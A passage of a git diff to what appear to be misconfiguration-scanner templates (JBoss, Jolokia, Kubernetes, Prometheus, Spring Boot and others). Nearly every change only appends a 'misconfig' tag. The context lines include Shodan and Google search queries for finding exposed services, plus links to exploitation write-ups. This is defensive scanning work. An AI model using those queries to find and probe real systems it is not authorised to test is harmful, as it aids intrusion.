config,java,javamelody + tags: config,java,javamelody,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jboss-status.yaml b/http/misconfiguration/jboss-status.yaml index 704f14789a..97df1c15c2 100644 --- a/http/misconfiguration/jboss-status.yaml +++ b/http/misconfiguration/jboss-status.yaml @@ -16,7 +16,7 @@ info: max-request: 1 verified: true google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true - tags: jboss,unauth,edb + tags: jboss,unauth,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml index 7d260e253f..3f5e0f5df7 100644 --- a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml +++ b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml @@ -7,7 +7,7 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,mbean,tomcat + tags: jolokia,springboot,mbean,tomcat,misconfig metadata: max-request: 16 diff --git a/http/misconfiguration/jolokia/jolokia-list.yaml b/http/misconfiguration/jolokia/jolokia-list.yaml index 98e9a43347..88a589a2b3 100644 --- a/http/misconfiguration/jolokia/jolokia-list.yaml +++ b/http/misconfiguration/jolokia/jolokia-list.yaml @@ -7,7 +7,7 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,tomcat + tags: jolokia,springboot,tomcat,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml index dfc08f6a41..46610a30cd 100644 --- a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml +++ b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml @@ -7,7 +7,7 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,mbean,tomcat + tags: jolokia,springboot,mbean,tomcat,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml b/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml index dc98a5e208..0ed076d493 100644 --- a/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml +++ b/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: jolokia,springboot,tomcat,lfi + tags: jolokia,springboot,tomcat,lfi,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jupyter-ipython-unauth.yaml b/http/misconfiguration/jupyter-ipython-unauth.yaml index e116c0d7c5..d94192f092 100644 --- a/http/misconfiguration/jupyter-ipython-unauth.yaml +++ b/http/misconfiguration/jupyter-ipython-unauth.yaml @@ -9,7 +9,7 @@ info: cvss-score: 10.0 cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cwe-id: CWE-288 - tags: unauth,jupyter + tags: unauth,jupyter,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubeflow-dashboard-unauth.yaml b/http/misconfiguration/kubeflow-dashboard-unauth.yaml index 4ba347848e..3cfefc8e41 100644 --- a/http/misconfiguration/kubeflow-dashboard-unauth.yaml +++ b/http/misconfiguration/kubeflow-dashboard-unauth.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/kubeflow/kubeflow - tags: kubeflow,unauth + tags: kubeflow,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml index ae72f8589c..0a34a584e0 100644 --- a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml @@ -7,7 +7,7 @@ info: description: Information Disclosure of Garbage Collection reference: - https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes - tags: kubernetes,exposure,devops + tags: kubernetes,exposure,devops,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/kubernetes-pods.yaml b/http/misconfiguration/kubernetes/kubernetes-pods.yaml index aa6e146225..4f0bad303e 100644 --- a/http/misconfiguration/kubernetes/kubernetes-pods.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-pods.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/officialhocc/Kubernetes-Kubelet-RCE - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ - tags: k8,unauth,kubernetes,devops + tags: k8,unauth,kubernetes,devops,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml index b7f2576861..bb0dd8de6c 100644 --- a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: kubernetes,exposure + tags: kubernetes,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml index 365506c7a5..f2eabd0eb8 100644 --- a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml +++ b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: product:"etcd" - tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous + tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig http: - method: GET diff --git a/http/misconfiguration/laravel-debug-error.yaml b/http/misconfiguration/laravel-debug-error.yaml index d667c6fd8b..6792fe9f93 100644 --- a/http/misconfiguration/laravel-debug-error.yaml +++ b/http/misconfiguration/laravel-debug-error.yaml @@ -4,7 +4,7 @@ info: name: Larvel Debug Method Enabled author: dhiyaneshDK severity: medium - tags: debug,laravel + tags: debug,laravel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 76fb2bdbba..9202b6dd16 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Libvirt" - tags: libvirt,exposure,debug + tags: libvirt,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index a6a140f7c6..40f0ada3b8 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -9,7 +9,7 @@ info: verified: true shodan-query: title:"Liferay" reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - tags: liferay,exposure,api + tags: liferay,exposure,api,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index f764f1a949..7103a00be8 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: title:"Liferay" - tags: liferay,exposure,api + tags: liferay,exposure,api,misconfig http: - method: GET diff --git a/http/misconfiguration/linkerd-ssrf-detect.yaml b/http/misconfiguration/linkerd-ssrf-detect.yaml index 8c1fe334cf..cd505c8314 100644 --- a/http/misconfiguration/linkerd-ssrf-detect.yaml +++ b/http/misconfiguration/linkerd-ssrf-detect.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://twitter.com/nirvana_msu/status/1084144955034165248 - tags: ssrf,linkerd,oast + tags: ssrf,linkerd,oast,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 3f98e5185a..33c448eb6c 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"LVM Exporter" - tags: lvm,exposure,debug + tags: lvm,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml index c1c0263a7e..db33cd956c 100644 --- a/http/misconfiguration/manage-engine-ad-search.yaml +++ b/http/misconfiguration/manage-engine-ad-search.yaml @@ -5,7 +5,7 @@ info: author: PR3R00T severity: high description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely. - tags: unauth + tags: unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/mlflow-unauth.yaml b/http/misconfiguration/mlflow-unauth.yaml index e98c28d34c..10f00eb20f 100644 --- a/http/misconfiguration/mlflow-unauth.yaml +++ b/http/misconfiguration/mlflow-unauth.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mlflow" - tags: unauth,mlflow,oss + tags: unauth,mlflow,oss,misconfig http: - method: GET diff --git a/http/misconfiguration/mongodb-exporter-metrics.yaml b/http/misconfiguration/mongodb-exporter-metrics.yaml index 6c68135daa..7456b8b552 100644 --- a/http/misconfiguration/mongodb-exporter-metrics.yaml +++ b/http/misconfiguration/mongodb-exporter-metrics.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 reference: - https://github.com/percona/mongodb_exporter - tags: mongodb,exposure,debug + tags: mongodb,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index 8d3a22df6b..5f816d4696 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Named Process Exporter" - tags: namedprocess,exposure,debug + tags: namedprocess,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/nextcloud-install.yaml b/http/misconfiguration/nextcloud-install.yaml index 470fee01e3..611cab5ae2 100644 --- a/http/misconfiguration/nextcloud-install.yaml +++ b/http/misconfiguration/nextcloud-install.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html - tags: tech,nextcloud,storage + tags: tech,nextcloud,storage,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/node-exporter-metrics.yaml b/http/misconfiguration/node-exporter-metrics.yaml index 4fd24a463a..712d75131a 100644 --- a/http/misconfiguration/node-exporter-metrics.yaml +++ b/http/misconfiguration/node-exporter-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,exposure,debug + tags: node,exposure,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/nomad-jobs.yaml b/http/misconfiguration/nomad-jobs.yaml index 2489c4e63f..09a80a8e7e 100644 --- a/http/misconfiguration/nomad-jobs.yaml +++ b/http/misconfiguration/nomad-jobs.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: nomad,devops,hashicorp,panel + tags: nomad,devops,hashicorp,panel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml index 33b55d10e9..872f5eb82b 100644 --- a/http/misconfiguration/odoo-unprotected-database.yaml +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: title:"Odoo" - tags: odoo,database,unauth + tags: odoo,database,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/office365-open-redirect.yaml b/http/misconfiguration/office365-open-redirect.yaml index 8641fc31c6..af833d561c 100644 --- a/http/misconfiguration/office365-open-redirect.yaml +++ b/http/misconfiguration/office365-open-redirect.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,office365,microsoft + tags: redirect,office365,microsoft,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml index 2421da8534..405f1bb4aa 100644 --- a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml +++ b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1550906681 - tags: ssrf,oast,openbmcs,edb + tags: ssrf,oast,openbmcs,edb,misconfig http: - raw: diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index a24f47c33a..5c3330f429 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"PgHero" - tags: exposure,panel,pghero + tags: exposure,panel,pghero,misconfig http: - method: GET diff --git a/http/misconfiguration/php-errors.yaml b/http/misconfiguration/php-errors.yaml index 345aa64d8a..715995b354 100644 --- a/http/misconfiguration/php-errors.yaml +++ b/http/misconfiguration/php-errors.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"PHP warning" || "Fatal error" - tags: debug,php + tags: debug,php,misconfig http: - method: GET diff --git a/http/misconfiguration/php-fpm-status.yaml b/http/misconfiguration/php-fpm-status.yaml index b0ef6e2c8a..dd1129e4fb 100644 --- a/http/misconfiguration/php-fpm-status.yaml +++ b/http/misconfiguration/php-fpm-status.yaml @@ -4,7 +4,7 @@ info: name: PHP-FPM Status author: geeknik severity: info - tags: config + tags: config,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/php-src-disclosure.yaml b/http/misconfiguration/php-src-disclosure.yaml index 158a0b15f4..f74dfbe3f0 100644 --- a/http/misconfiguration/php-src-disclosure.yaml +++ b/http/misconfiguration/php-src-disclosure.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-540 - tags: php,phpcli,diclosure + tags: php,phpcli,diclosure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/pinpoint-unauth.yaml b/http/misconfiguration/pinpoint-unauth.yaml index 2958cd8f0d..f35557d0b3 100644 --- a/http/misconfiguration/pinpoint-unauth.yaml +++ b/http/misconfiguration/pinpoint-unauth.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/pinpoint-apm/pinpoint - tags: pippoint,unauth + tags: pippoint,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index 4fec01db38..1a60b3097b 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Postgres exporter" - tags: postgres,exposure,debug + tags: postgres,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/private-key-exposure.yaml b/http/misconfiguration/private-key-exposure.yaml index a20ad153ac..25b48cb168 100644 --- a/http/misconfiguration/private-key-exposure.yaml +++ b/http/misconfiguration/private-key-exposure.yaml @@ -5,7 +5,7 @@ info: author: aashiq severity: high description: Searches for private key exposure by attempting to query the helper endpoint on node_modules - tags: exposure,node + tags: exposure,node,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-config.yaml b/http/misconfiguration/prometheus/prometheus-config.yaml index e59fe2ce1c..4a7d52b3ad 100644 --- a/http/misconfiguration/prometheus/prometheus-config.yaml +++ b/http/misconfiguration/prometheus/prometheus-config.yaml @@ -8,7 +8,7 @@ info: credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,config + tags: prometheus,config,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-exporter.yaml b/http/misconfiguration/prometheus/prometheus-exporter.yaml index 7c1677d9f2..f0e3bd5e94 100644 --- a/http/misconfiguration/prometheus/prometheus-exporter.yaml +++ b/http/misconfiguration/prometheus/prometheus-exporter.yaml @@ -7,7 +7,7 @@ info: description: Prometheus exporter detector reference: - https://github.com/prometheus/prometheus/wiki/Default-port-allocations - tags: prometheus + tags: prometheus,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-flags.yaml b/http/misconfiguration/prometheus/prometheus-flags.yaml index 5b2256ae03..fbe63814b6 100644 --- a/http/misconfiguration/prometheus/prometheus-flags.yaml +++ b/http/misconfiguration/prometheus/prometheus-flags.yaml @@ -7,7 +7,7 @@ info: description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,leak + tags: prometheus,leak,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml index bf7783af80..78cfcda884 100644 --- a/http/misconfiguration/prometheus/prometheus-log.yaml +++ b/http/misconfiguration/prometheus/prometheus-log.yaml @@ -4,7 +4,7 @@ info: name: Exposed Prometheus author: dhiyaneshDK severity: low - tags: prometheus + tags: prometheus,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/prometheus/prometheus-targets.yaml b/http/misconfiguration/prometheus/prometheus-targets.yaml index cf603c496a..590a073338 100644 --- a/http/misconfiguration/prometheus/prometheus-targets.yaml +++ b/http/misconfiguration/prometheus/prometheus-targets.yaml @@ -9,7 +9,7 @@ info: data in these labels, oftentimes without the developer's knowledge. reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus + tags: prometheus,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index a72f563785..5d560b9b74 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -24,9 +24,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 + tags: exposure,proxy,aws,amazon,misconfig,metadata metadata: max-request: 4 - tags: exposure,proxy,aws,amazon,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/put-method-enabled.yaml b/http/misconfiguration/put-method-enabled.yaml index a4b01e5096..e67c4619f1 100644 --- a/http/misconfiguration/put-method-enabled.yaml +++ b/http/misconfiguration/put-method-enabled.yaml @@ -9,7 +9,7 @@ info: other attacks. reference: - https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled - tags: injection + tags: injection,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 65d6cc9a97..33c9dabef0 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: html:"python_gc_objects_collected_total" - tags: exposure,devops,python + tags: exposure,devops,python,misconfig http: - method: GET diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index f4e76135b7..0dcf11311e 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"RabbitMQ Exporter" - tags: rabbitmq,exposure,debug + tags: rabbitmq,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/rack-mini-profiler.yaml b/http/misconfiguration/rack-mini-profiler.yaml index 0b3c4a5d07..44c9bbcbb6 100644 --- a/http/misconfiguration/rack-mini-profiler.yaml +++ b/http/misconfiguration/rack-mini-profiler.yaml @@ -5,7 +5,7 @@ info: author: vzamanillo severity: high description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks. - tags: config,debug,rails + tags: config,debug,rails,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/salesforce-aura.yaml b/http/misconfiguration/salesforce-aura.yaml index 165d8b3263..54ccbaa7a1 100644 --- a/http/misconfiguration/salesforce-aura.yaml +++ b/http/misconfiguration/salesforce-aura.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: aura,unauth,salesforce,exposure + tags: aura,unauth,salesforce,exposure,misconfig metadata: max-request: 5 diff --git a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml index 1f47562ef1..7f2d3a6931 100644 --- a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: sap + tags: sap,misconfig http: - method: GET diff --git a/http/misconfiguration/server-status-localhost.yaml b/http/misconfiguration/server-status-localhost.yaml index 41eadf0b82..df60fe4dbf 100644 --- a/http/misconfiguration/server-status-localhost.yaml +++ b/http/misconfiguration/server-status-localhost.yaml @@ -4,7 +4,7 @@ info: name: Server Status Disclosure author: pdteam,geeknik severity: low - tags: apache,debug + tags: apache,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/service-pwd.yaml b/http/misconfiguration/service-pwd.yaml index 4cec98b01f..17757f869a 100644 --- a/http/misconfiguration/service-pwd.yaml +++ b/http/misconfiguration/service-pwd.yaml @@ -7,7 +7,7 @@ info: description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service,edb + tags: exposure,listing,service,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index 098a5cce86..1b0d1811b0 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1373456171 - tags: panel,exposure,setup,github + tags: panel,exposure,setup,github,misconfig http: - method: GET diff --git a/http/misconfiguration/sitecore-debug-page.yaml b/http/misconfiguration/sitecore-debug-page.yaml index e9a7cd57d2..250864a7a5 100644 --- a/http/misconfiguration/sitecore-debug-page.yaml +++ b/http/misconfiguration/sitecore-debug-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to Sitecore" - tags: debug,sitecore + tags: debug,sitecore,misconfig http: - method: GET diff --git a/http/misconfiguration/sitecore-lfi.yaml b/http/misconfiguration/sitecore-lfi.yaml index 74857e0a2e..7eae20ad6f 100644 --- a/http/misconfiguration/sitecore-lfi.yaml +++ b/http/misconfiguration/sitecore-lfi.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Sitecore" - tags: sitecore,lfi + tags: sitecore,lfi,misconfig http: - method: GET diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml index 3c6c53b990..dd9f50a93b 100644 --- a/http/misconfiguration/solr-query-dashboard.yaml +++ b/http/misconfiguration/solr-query-dashboard.yaml @@ -7,7 +7,7 @@ info: description: Solr's admin page was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5856 - tags: solr,unauth,edb + tags: solr,unauth,edb,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/spidercontrol-scada-server-info.yaml b/http/misconfiguration/spidercontrol-scada-server-info.yaml index 555c09deac..12425346e1 100644 --- a/http/misconfiguration/spidercontrol-scada-server-info.yaml +++ b/http/misconfiguration/spidercontrol-scada-server-info.yaml @@ -7,7 +7,7 @@ info: description: SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. reference: - https://spidercontrol.net/spidercontrol-inside/ - tags: spidercontrol,scada,exposure + tags: spidercontrol,scada,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/springboot/springboot-autoconfig.yaml b/http/misconfiguration/springboot/springboot-autoconfig.yaml index 5b0f8b3011..234ebfacb7 100644 --- a/http/misconfiguration/springboot/springboot-autoconfig.yaml +++ b/http/misconfiguration/springboot/springboot-autoconfig.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-beans.yaml b/http/misconfiguration/springboot/springboot-beans.yaml index 966ffc1563..bdca65d657 100644 --- a/http/misconfiguration/springboot/springboot-beans.yaml +++ b/http/misconfiguration/springboot/springboot-beans.yaml @@ -5,7 +5,7 @@ info: author: ajaysenr severity: low description: Displays a complete list of all the Spring beans in the application - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index a3cc0642e7..65df3dff42 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Sensitive environment variables may not be masked - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-dump.yaml b/http/misconfiguration/springboot/springboot-dump.yaml index e39da1e14b..5719fb3b15 100644 --- a/http/misconfiguration/springboot/springboot-dump.yaml +++ b/http/misconfiguration/springboot/springboot-dump.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Performs a thread dump - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-gateway.yaml b/http/misconfiguration/springboot/springboot-gateway.yaml index 207a2d1114..ce528c8ca3 100644 --- a/http/misconfiguration/springboot/springboot-gateway.yaml +++ b/http/misconfiguration/springboot/springboot-gateway.yaml @@ -7,7 +7,7 @@ info: description: Sensitive environment variables may not be masked reference: - https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-health.yaml b/http/misconfiguration/springboot/springboot-health.yaml index 6948362945..b455d4cc05 100644 --- a/http/misconfiguration/springboot/springboot-health.yaml +++ b/http/misconfiguration/springboot/springboot-health.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index c7e74a1f5b..e17e449dc0 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -10,7 +10,7 @@ info: - https://github.com/pyn3rd/Spring-Boot-Vulnerability metadata: max-request: 3 - tags: springboot,exposure + tags: springboot,exposure,misconfig variables: str: "{{rand_base(6)}}" diff --git a/http/misconfiguration/springboot/springboot-httptrace.yaml b/http/misconfiguration/springboot/springboot-httptrace.yaml index cca102bcc2..795b25dcca 100644 --- a/http/misconfiguration/springboot/springboot-httptrace.yaml +++ b/http/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-info.yaml b/http/misconfiguration/springboot/springboot-info.yaml index d9b8089c60..afe6df383e 100644 --- a/http/misconfiguration/springboot/springboot-info.yaml +++ b/http/misconfiguration/springboot/springboot-info.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: springboot + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index 4612e17e0c..85408ca4ac 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -4,7 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low - tags: springboot,exposure + tags: 